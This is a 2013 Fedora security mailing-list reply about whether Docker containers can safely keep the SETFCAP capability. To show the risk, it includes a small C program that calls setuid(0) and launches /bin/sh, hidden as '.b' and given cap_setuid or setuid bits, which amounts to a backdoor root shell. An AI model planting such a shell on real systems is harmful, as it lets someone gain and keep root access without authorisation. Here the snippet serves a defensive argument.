Re: leaving setfcap in docker containers

On 09/27/2013 05:28 PM, Matthew Miller wrote: > > We're considering removing setfcap from the list of dropped capabilities. > It seems safe to me I dont have any security degrees nor do I consider myself an evil man and probably Steve and Dan would be better suited to answer this question since I'm far from being any expert on the subject but hypothetically would not someone being able to do something like this in this educational sample I'm providing cd ~user vi bd.c #include <unistd.h> #include <fcntl.h> main() { setuid(0); char *name[2]; name[0] = "/bin/sh"; name[1] = 0x0; execve(name[0], name, 0x0); return 0; } gcc bd.c -o .b chown user:user .b chmod 750 .b setcap cap_setuid=ep rm bd.c ./.b if you did? I personally would recommend we kept it on after all Dan did push for that feature for a reason but as I said I'm no expert on the topic. JBG -- security mailing list security(a)lists.fedoraproject.org https://admin.fedoraproject.org/mailman/listinfo/security

chown user:user .b chmod 4750 .b rm bd.c ./.b

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.14 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEARECAAYFAlJIDIEACgkQrlYvE4MpobPJXgCgiENLuXzXzp0Mjukbb5L9DR2q ItgAn3pUJ15qATkVQEgUy2SuHqpGNX8y =pPRa -----END PGP SIGNATURE-----